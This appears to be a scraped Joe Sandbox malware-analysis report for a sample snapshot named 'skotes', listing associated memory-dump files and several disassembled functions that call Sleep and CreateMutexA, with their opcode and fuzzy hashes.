Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c4b258281c4ff948adf44f00626cac17e7687f7133b50ca799e655638e70a4a9
Instruction ID: 1a5f51b08acd5240face8c95723f3e1ef8dae3d2c5bcb8939ecc6d5b19cbdf57
Opcode Fuzzy Hash: c4b258281c4ff948adf44f00626cac17e7687f7133b50ca799e655638e70a4a9
Instruction Fuzzy Hash: F3312731F012498BEB08DB78D8C9F6DBB66EBC5328F24861CE4549B3D5C73989818767

Function 009CA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e7906ea3be00d0102f98233cc011d23c24b6224939a76d8ecc15153ff026282f
Instruction ID: fb6503ac9828eb8984851d03d4672a5e55a45f56fb790a9fb26ef1a5c3801fb1
Opcode Fuzzy Hash: e7906ea3be00d0102f98233cc011d23c24b6224939a76d8ecc15153ff026282f
Instruction Fuzzy Hash: 29311831F002099BEB18DB78DD89FADBB66EBC5328F24861DE414973E5C73989808757

Function 009C9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c35c2c7c61ec469864fe4dcedb6829d532050c96c510b562be515db192910734
Instruction ID: 788220286994864fa3c2d3a23ce04f44e7f790149f712dc6aa17cf451022cc07
Opcode Fuzzy Hash: c35c2c7c61ec469864fe4dcedb6829d532050c96c510b562be515db192910734
Instruction Fuzzy Hash: 29213732B042059BEB18AB6CECCDF6DB765EBD1314F20421DE408973E5CB7999818B52

Function 009CA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 05d16acdcbeea71214dc6e9dabf7ec5ac45c2ce4ec09225750ecc57aa876134b
Instruction ID: 4d0361d0fb37cd1a74f89c2bdef8c220a19861d50a0d11dceaffdb401a0a02c8
Opcode Fuzzy Hash: 05d16acdcbeea71214dc6e9dabf7ec5ac45c2ce4ec09225750ecc57aa876134b
Instruction Fuzzy Hash: 0F219D31B452099BFB24A7A8889AF7DB665EFC1304F20081EE505D73D1CA7E898186A3

Function 009CA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
